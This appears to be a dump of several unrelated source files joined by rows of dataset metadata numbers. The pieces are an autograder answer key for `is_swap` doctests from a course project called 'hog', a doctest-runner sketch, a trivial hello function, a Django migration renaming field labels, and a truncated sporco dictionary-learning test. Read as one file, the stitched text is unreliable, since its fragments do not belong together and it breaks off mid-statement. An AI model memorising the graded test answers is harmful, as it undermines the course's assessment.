>>> is_swap(117, 575)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(828, 631)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(985, 905)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(915, 539)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(203, 969)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(214, 114)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(367, 337)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(787, 46)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(146, 942)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(859, 137)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(368, 19)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(385, 335)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(213, 186)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(250, 950)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(213, 186)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(902, 603)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(42, 801)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(892, 474)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(535, 807)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(753, 857)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(160, 909)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(796, 99)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(333, 699)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(288, 975)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(417, 794)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(481, 14)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(686, 874)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(42, 835)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(0, 460)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(186, 253)
True
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(297, 531)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(986, 422)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(419, 105)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(554, 180)
False
""",
'hidden': False,
'locked': False
},
{
'code': r"""
>>> is_swap(334, 34)
True
""",
'hidden': False,
'locked': False
}
],
'scored': True,
'setup': r"""
>>> from hog import *
""",
'teardown': '',
'type': 'doctest'
}
]
}
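# The dictionary above is an ok-style test description: every entry under
# 'cases' is a doctest snippet that is evaluated after the suite's 'setup'
# code, and a case passes when the actual output matches the expected output.
# The sketch below shows how one such case could be checked with the standard
# doctest module; it is an illustration only, not the course autograder, and
# `run_case` is a hypothetical helper (it also needs `hog` to be importable
# for the setup line to succeed).
import doctest

def run_case(setup_code, case_code):
    """Run one 'doctest'-type case; return True if the expected output matches."""
    source = setup_code + "\n" + case_code          # setup shares globals with the case
    parser = doctest.DocTestParser()
    runner = doctest.DocTestRunner(verbose=False)
    case = parser.get_doctest(source, {}, 'case', '<case>', 0)
    runner.run(case)
    return runner.failures == 0

# For example: run_case(test['suites'][0]['setup'], test['suites'][0]['cases'][0]['code'])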
| 19.743811
| 31
| 0.277124
| 1,272
| 18,342
| 3.906447
| 0.165094
| 0.114711
| 0.160596
| 0.252365
| 0.871604
| 0.863755
| 0.863755
| 0.863755
| 0.863755
| 0.192192
| 0
| 0.076781
| 0.558336
| 18,342
| 928
| 32
| 19.765086
| 0.5366
| 0
| 0
| 0.617457
| 0
| 0
| 0.46429
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.001078
| 0
| 0.001078
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81a8a79745440cdace8ecafcb0a2ffd03f57f378
| 39
|
py
|
Python
|
test_path/libs/hello.py
|
mozz100/pytest-pythonpath
|
af0f3024485a75d442e56188d517307dafae3bae
|
[
"MIT"
] | 70
|
2015-01-12T13:23:28.000Z
|
2021-05-28T07:14:15.000Z
|
test_path/libs/hello.py
|
mozz100/pytest-pythonpath
|
af0f3024485a75d442e56188d517307dafae3bae
|
[
"MIT"
] | 9
|
2015-01-13T18:17:41.000Z
|
2021-04-05T19:34:37.000Z
|
test_path/libs/hello.py
|
mozz100/pytest-pythonpath
|
af0f3024485a75d442e56188d517307dafae3bae
|
[
"MIT"
] | 13
|
2015-01-13T09:45:31.000Z
|
2021-05-20T23:03:29.000Z
|
def return_hello():
return "hello"
| 13
| 19
| 0.666667
| 5
| 39
| 5
| 0.6
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.205128
| 39
| 2
| 20
| 19.5
| 0.806452
| 0
| 0
| 0
| 0
| 0
| 0.128205
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
81b850f660cddeeaf759d44cb9ea36542b843d0d
| 31,281
|
py
|
Python
|
workflow/migrations/0017_auto_20180419_0905.py
|
mercycorps/TolaWorkflow
|
59542132fafd611081adb0e8cfaa04abc5886d7a
|
[
"Apache-2.0"
] | null | null | null |
workflow/migrations/0017_auto_20180419_0905.py
|
mercycorps/TolaWorkflow
|
59542132fafd611081adb0e8cfaa04abc5886d7a
|
[
"Apache-2.0"
] | 268
|
2020-03-31T15:46:59.000Z
|
2022-03-31T18:01:08.000Z
|
workflow/migrations/0017_auto_20180419_0905.py
|
Falliatcom-sa/falliatcom
|
39fb926de072c296ed32d50cccfb8003ca870739
|
[
"Apache-2.0"
] | 1
|
2021-01-05T01:58:24.000Z
|
2021-01-05T01:58:24.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2018-04-19 16:05
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('workflow', '0016_auto_20170623_1306'),
]
operations = [
migrations.AlterModelOptions(
name='checklistitem',
options={'ordering': ('item',), 'verbose_name': 'Checklist Item'},
),
migrations.AlterModelOptions(
name='formguidance',
options={'ordering': ('create_date',), 'verbose_name': 'Form Guidance'},
),
migrations.AlterModelOptions(
name='fundcode',
options={'ordering': ('name',), 'verbose_name': 'Fund Code'},
),
migrations.AlterModelOptions(
name='landtype',
options={'ordering': ('classify_land',), 'verbose_name': 'Land Type'},
),
migrations.AlterModelOptions(
name='office',
options={'ordering': ('name',), 'verbose_name': 'Office'},
),
migrations.AlterModelOptions(
name='profiletype',
options={'ordering': ('profile',), 'verbose_name': 'Profile Type'},
),
migrations.AlterModelOptions(
name='program',
options={'ordering': ('name',), 'verbose_name': 'Program'},
),
migrations.AlterModelOptions(
name='projecttype',
options={'ordering': ('name',), 'verbose_name': 'Project Type'},
),
migrations.AlterModelOptions(
name='sector',
options={'ordering': ('sector',), 'verbose_name': 'Sector'},
),
migrations.AlterModelOptions(
name='template',
options={'ordering': ('name',), 'verbose_name': 'Template'},
),
migrations.AlterModelOptions(
name='tolabookmarks',
options={'ordering': ('name',), 'verbose_name': 'Tola Bookmarks'},
),
migrations.AlterModelOptions(
name='tolauser',
options={'ordering': ('name',), 'verbose_name': 'Tola User'},
),
migrations.AlterField(
model_name='approvalauthority',
name='approval_user',
field=models.ForeignKey(blank=True, help_text='User with Approval Authority', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='auth_approving', to='workflow.TolaUser', verbose_name='Tola User'),
),
migrations.AlterField(
model_name='approvalauthority',
name='country',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='benchmarks',
name='actual_end_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual end date'),
),
migrations.AlterField(
model_name='benchmarks',
name='actual_start_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual start date'),
),
migrations.AlterField(
model_name='benchmarks',
name='complete',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProjectComplete', verbose_name='Complete'),
),
migrations.AlterField(
model_name='benchmarks',
name='est_end_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Est end date'),
),
migrations.AlterField(
model_name='benchmarks',
name='est_start_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Est start date'),
),
migrations.AlterField(
model_name='benchmarks',
name='site',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.SiteProfile', verbose_name='site'),
),
migrations.AlterField(
model_name='budget',
name='complete',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='workflow.ProjectComplete', verbose_name='Complete'),
),
migrations.AlterField(
model_name='budget',
name='contributor',
field=models.CharField(blank=True, max_length=135, null=True, verbose_name='Contributor'),
),
migrations.AlterField(
model_name='budget',
name='description_of_contribution',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Description of contribution'),
),
migrations.AlterField(
model_name='checklist',
name='country',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='checklist',
name='name',
field=models.CharField(blank=True, default='Checklist', max_length=255, null=True, verbose_name='Name'),
),
migrations.AlterField(
model_name='checklistitem',
name='checklist',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Checklist', verbose_name='Checklist'),
),
migrations.AlterField(
model_name='checklistitem',
name='item',
field=models.CharField(max_length=255, verbose_name='Item'),
),
migrations.AlterField(
model_name='checklistitem',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.TolaUser', verbose_name='Owner'),
),
migrations.AlterField(
model_name='contact',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='country',
name='create_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='country',
name='edit_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='country',
name='organization',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Organization', verbose_name='organization'),
),
migrations.AlterField(
model_name='documentation',
name='description',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Description'),
),
migrations.AlterField(
model_name='documentation',
name='program',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Program', verbose_name='Program'),
),
migrations.AlterField(
model_name='documentation',
name='project',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProjectAgreement', verbose_name='Project'),
),
migrations.AlterField(
model_name='documentation',
name='template',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Template', verbose_name='Template'),
),
migrations.AlterField(
model_name='formguidance',
name='form',
field=models.CharField(blank=True, max_length=135, null=True, verbose_name='Form'),
),
migrations.AlterField(
model_name='formguidance',
name='guidance',
field=models.TextField(blank=True, null=True, verbose_name='Guidance'),
),
migrations.AlterField(
model_name='historicalbudget',
name='contributor',
field=models.CharField(blank=True, max_length=135, null=True, verbose_name='Contributor'),
),
migrations.AlterField(
model_name='historicalbudget',
name='description_of_contribution',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Description of contribution'),
),
migrations.AlterField(
model_name='historicalprojectagreement',
name='description_of_community_involvement',
field=models.TextField(blank=True, null=True, verbose_name='Description of community involvement'),
),
migrations.AlterField(
model_name='historicalprojectagreement',
name='description_of_government_involvement',
field=models.TextField(blank=True, null=True, verbose_name='Description of government involvement'),
),
migrations.AlterField(
model_name='historicalprojectagreement',
name='description_of_project_activities',
field=models.TextField(blank=True, null=True, verbose_name='Description of project activities'),
),
migrations.AlterField(
model_name='historicalprojectagreement',
name='estimation_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Estimation date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='actual_cost_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual cost date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='actual_duration',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Actual duaration'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='actual_end_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual end date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='actual_start_date',
field=models.DateTimeField(blank=True, help_text='Imported from Project Initiation', null=True, verbose_name='Actual start date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='expected_end_date',
field=models.DateTimeField(blank=True, help_text='Imported Project Initiation', null=True, verbose_name='Expected end date'),
),
migrations.AlterField(
model_name='historicalprojectcomplete',
name='expected_start_date',
field=models.DateTimeField(blank=True, help_text='Imported from Project Initiation', null=True, verbose_name='Expected start date'),
),
migrations.AlterField(
model_name='historicalsiteprofile',
name='male_6_9',
field=models.IntegerField(blank=True, null=True, verbose_name='Male age 6-9'),
),
migrations.AlterField(
model_name='historicalsiteprofile',
name='total_female',
field=models.IntegerField(blank=True, null=True, verbose_name='Total female'),
),
migrations.AlterField(
model_name='historicalsiteprofile',
name='total_male',
field=models.IntegerField(blank=True, null=True, verbose_name='Total male'),
),
migrations.AlterField(
model_name='historicalsiteprofile',
name='total_population',
field=models.IntegerField(blank=True, null=True, verbose_name='Total population'),
),
migrations.AlterField(
model_name='loggeduser',
name='country',
field=models.CharField(max_length=100, verbose_name='Country'),
),
migrations.AlterField(
model_name='loggeduser',
name='email',
field=models.CharField(default='user@mercycorps.com', max_length=100, verbose_name='Email'),
),
migrations.AlterField(
model_name='loggeduser',
name='username',
field=models.CharField(max_length=30, primary_key=True, serialize=False, verbose_name='Username'),
),
migrations.AlterField(
model_name='monitor',
name='complete',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProjectComplete', verbose_name='complete'),
),
migrations.AlterField(
model_name='organization',
name='create_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='organization',
name='edit_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='organization',
name='organization_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Organization url'),
),
migrations.AlterField(
model_name='program',
name='country',
field=models.ManyToManyField(to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='program',
name='fund_code',
field=models.ManyToManyField(blank=True, to='workflow.FundCode', verbose_name='Fund code'),
),
migrations.AlterField(
model_name='program',
name='sector',
field=models.ManyToManyField(blank=True, to='workflow.Sector', verbose_name='Sector'),
),
migrations.AlterField(
model_name='projectagreement',
name='approval_submitted_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submitted_by_agreement', to='workflow.TolaUser', verbose_name='Approval submitted by'),
),
migrations.AlterField(
model_name='projectagreement',
name='checked_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='checking', to='workflow.TolaUser', verbose_name='Checked by'),
),
migrations.AlterField(
model_name='projectagreement',
name='description_of_community_involvement',
field=models.TextField(blank=True, null=True, verbose_name='Description of community involvement'),
),
migrations.AlterField(
model_name='projectagreement',
name='description_of_government_involvement',
field=models.TextField(blank=True, null=True, verbose_name='Description of government involvement'),
),
migrations.AlterField(
model_name='projectagreement',
name='description_of_project_activities',
field=models.TextField(blank=True, null=True, verbose_name='Description of project activities'),
),
migrations.AlterField(
model_name='projectagreement',
name='estimation_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Estimation date'),
),
migrations.AlterField(
model_name='projectagreement',
name='evaluate',
field=models.ManyToManyField(blank=True, to='workflow.Evaluate', verbose_name='Evaluate'),
),
migrations.AlterField(
model_name='projectagreement',
name='finance_reviewed_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='finance_reviewing', to='workflow.TolaUser', verbose_name='Finance reviewed by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='actual_cost_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual cost date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='actual_duration',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Actual duaration'),
),
migrations.AlterField(
model_name='projectcomplete',
name='actual_end_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Actual end date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='actual_start_date',
field=models.DateTimeField(blank=True, help_text='Imported from Project Initiation', null=True, verbose_name='Actual start date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='approval_submitted_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='submitted_by_complete', to='workflow.TolaUser', verbose_name='Approval submitted by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='approved_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='approving_agreement_complete', to='workflow.TolaUser', verbose_name='Approved by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='checked_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='checking_complete', to='workflow.TolaUser', verbose_name='Checked by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='estimated_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='estimating_complete', to='workflow.TolaUser', verbose_name='Estimated by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='expected_end_date',
field=models.DateTimeField(blank=True, help_text='Imported Project Initiation', null=True, verbose_name='Expected end date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='expected_start_date',
field=models.DateTimeField(blank=True, help_text='Imported from Project Initiation', null=True, verbose_name='Expected start date'),
),
migrations.AlterField(
model_name='projectcomplete',
name='office',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Office', verbose_name='Office'),
),
migrations.AlterField(
model_name='projectcomplete',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='complete', to='workflow.Program', verbose_name='Program'),
),
migrations.AlterField(
model_name='projectcomplete',
name='project_type',
field=models.ForeignKey(blank=True, max_length=255, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProjectType', verbose_name='Project Type'),
),
migrations.AlterField(
model_name='projectcomplete',
name='reviewed_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='reviewing_complete', to='workflow.TolaUser', verbose_name='Reviewed by'),
),
migrations.AlterField(
model_name='projectcomplete',
name='sector',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Sector', verbose_name='Sector'),
),
migrations.AlterField(
model_name='projectcomplete',
name='site',
field=models.ManyToManyField(blank=True, to='workflow.SiteProfile', verbose_name='Site'),
),
migrations.AlterField(
model_name='projectcomplete',
name='stakeholder',
field=models.ManyToManyField(blank=True, to='workflow.Stakeholder', verbose_name='Stakeholder'),
),
migrations.AlterField(
model_name='projecttype',
name='description',
field=models.CharField(max_length=765, verbose_name='Description'),
),
migrations.AlterField(
model_name='province',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='siteprofile',
name='approved_by',
field=models.ForeignKey(blank=True, help_text='This is the Provincial Line Manager', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comm_approving', to='workflow.TolaUser', verbose_name='Approved by'),
),
migrations.AlterField(
model_name='siteprofile',
name='classify_land',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.LandType', verbose_name='Classify land'),
),
migrations.AlterField(
model_name='siteprofile',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='siteprofile',
name='filled_by',
field=models.ForeignKey(blank=True, help_text='This is the originator', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comm_estimate', to='workflow.TolaUser', verbose_name='Filled by'),
),
migrations.AlterField(
model_name='siteprofile',
name='location_verified_by',
field=models.ForeignKey(blank=True, help_text='This should be GIS Manager', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='comm_gis', to='workflow.TolaUser', verbose_name='Location verified by'),
),
migrations.AlterField(
model_name='siteprofile',
name='male_6_9',
field=models.IntegerField(blank=True, null=True, verbose_name='Male age 6-9'),
),
migrations.AlterField(
model_name='siteprofile',
name='office',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Office', verbose_name='Office'),
),
migrations.AlterField(
model_name='siteprofile',
name='total_female',
field=models.IntegerField(blank=True, null=True, verbose_name='Total female'),
),
migrations.AlterField(
model_name='siteprofile',
name='total_male',
field=models.IntegerField(blank=True, null=True, verbose_name='Total male'),
),
migrations.AlterField(
model_name='siteprofile',
name='total_population',
field=models.IntegerField(blank=True, null=True, verbose_name='Total population'),
),
migrations.AlterField(
model_name='siteprofile',
name='type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.ProfileType', verbose_name='Type'),
),
migrations.AlterField(
model_name='stakeholder',
name='approved_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stake_approving', to='workflow.TolaUser', verbose_name='Approved by'),
),
migrations.AlterField(
model_name='stakeholder',
name='contact',
field=models.ManyToManyField(blank=True, max_length=255, to='workflow.Contact', verbose_name='Contact'),
),
migrations.AlterField(
model_name='stakeholder',
name='country',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='stakeholder',
name='filled_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='stake_filled', to='workflow.TolaUser', verbose_name='Filled by'),
),
migrations.AlterField(
model_name='stakeholder',
name='notes',
field=models.TextField(blank=True, max_length=765, null=True, verbose_name='Notes'),
),
migrations.AlterField(
model_name='stakeholder',
name='sectors',
field=models.ManyToManyField(blank=True, to='workflow.Sector', verbose_name='Sectors'),
),
migrations.AlterField(
model_name='stakeholder',
name='type',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.StakeholderType', verbose_name='Type'),
),
migrations.AlterField(
model_name='template',
name='description',
field=models.CharField(max_length=765, verbose_name='Description'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='bookmark_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Bookmark url'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='create_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Create date'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='edit_date',
field=models.DateTimeField(blank=True, null=True, verbose_name='Edit date'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='name',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Name'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='program',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Program', verbose_name='Program'),
),
migrations.AlterField(
model_name='tolabookmarks',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='tolabookmark', to='workflow.TolaUser', verbose_name='User'),
),
migrations.AlterField(
model_name='tolasites',
name='agency_name',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Agency name'),
),
migrations.AlterField(
model_name='tolasites',
name='agency_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Agency url'),
),
migrations.AlterField(
model_name='tolasites',
name='created',
field=models.DateTimeField(blank=True, null=True, verbose_name='Created'),
),
migrations.AlterField(
model_name='tolasites',
name='name',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Name'),
),
migrations.AlterField(
model_name='tolasites',
name='privacy_disclaimer',
field=models.TextField(blank=True, null=True, verbose_name='Privacy disclaimer'),
),
migrations.AlterField(
model_name='tolasites',
name='site',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site', verbose_name='Site'),
),
migrations.AlterField(
model_name='tolasites',
name='tola_report_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Tola report url'),
),
migrations.AlterField(
model_name='tolasites',
name='tola_tables_token',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Tola tables token'),
),
migrations.AlterField(
model_name='tolasites',
name='tola_tables_url',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Tola tables url'),
),
migrations.AlterField(
model_name='tolasites',
name='tola_tables_user',
field=models.CharField(blank=True, max_length=255, null=True, verbose_name='Tola tables user'),
),
migrations.AlterField(
model_name='tolasites',
name='updated',
field=models.DateTimeField(blank=True, null=True, verbose_name='Updated'),
),
migrations.AlterField(
model_name='tolauser',
name='country',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Country', verbose_name='Country'),
),
migrations.AlterField(
model_name='tolauser',
name='organization',
field=models.ForeignKey(blank=True, default=1, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.Organization', verbose_name='Organization'),
),
migrations.AlterField(
model_name='tolauser',
name='title',
field=models.CharField(blank=True, choices=[('mr', 'Mr.'), ('mrs', 'Mrs.'), ('ms', 'Ms.')], max_length=3, null=True, verbose_name='Title'),
),
migrations.AlterField(
model_name='tolauser',
name='user',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='tola_user', to=settings.AUTH_USER_MODEL, verbose_name='User'),
),
migrations.AlterField(
model_name='village',
name='district',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='workflow.District', verbose_name='District'),
),
]
| 46.968468
| 236
| 0.620153
| 3,062
| 31,281
| 6.176029
| 0.067929
| 0.076781
| 0.158638
| 0.18402
| 0.881127
| 0.848977
| 0.7686
| 0.701814
| 0.672624
| 0.645815
| 0
| 0.005408
| 0.255171
| 31,281
| 665
| 237
| 47.039098
| 0.806258
| 0.002174
| 0
| 0.787234
| 1
| 0
| 0.208427
| 0.028933
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015198
| 0
| 0.019757
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
81daf20c49b5f3353991363c4a6421a1abf04c21
| 2,819
|
py
|
Python
|
alphacsc/other/sporco/sporco/admm/tests/test_cmod.py
|
sophiaas/alphacsc
|
402b8f6c8ee4ba9c86e9da0e2073d900cf8da207
|
[
"BSD-3-Clause"
] | 89
|
2017-05-31T19:20:52.000Z
|
2022-03-22T09:52:17.000Z
|
alphacsc/other/sporco/sporco/admm/tests/test_cmod.py
|
sophiaas/alphacsc
|
402b8f6c8ee4ba9c86e9da0e2073d900cf8da207
|
[
"BSD-3-Clause"
] | 75
|
2017-07-15T14:03:40.000Z
|
2022-03-29T17:31:58.000Z
|
alphacsc/other/sporco/sporco/admm/tests/test_cmod.py
|
sophiaas/alphacsc
|
402b8f6c8ee4ba9c86e9da0e2073d900cf8da207
|
[
"BSD-3-Clause"
] | 35
|
2017-06-16T12:48:23.000Z
|
2022-03-21T09:49:55.000Z
|
from __future__ import division
from builtins import object
import pytest
import numpy as np
from sporco.admm import cmod
import sporco.linalg as sl
class TestSet01(object):
def setup_method(self, method):
pass
def test_01(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
try:
b = cmod.CnstrMOD(X, S, (N, M))
b.solve()
except Exception as e:
print(e)
assert(0)
def test_02(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
try:
b = cmod.CnstrMOD(X, S)
b.solve()
except Exception as e:
print(e)
assert(0)
def test_03(self):
N = 16
M = 4
K = 8
X = np.random.randn(M, K)
S = np.random.randn(N, K)
dt = np.float16
opt = cmod.CnstrMOD.Options({'Verbose': False, 'MaxMainIter': 20,
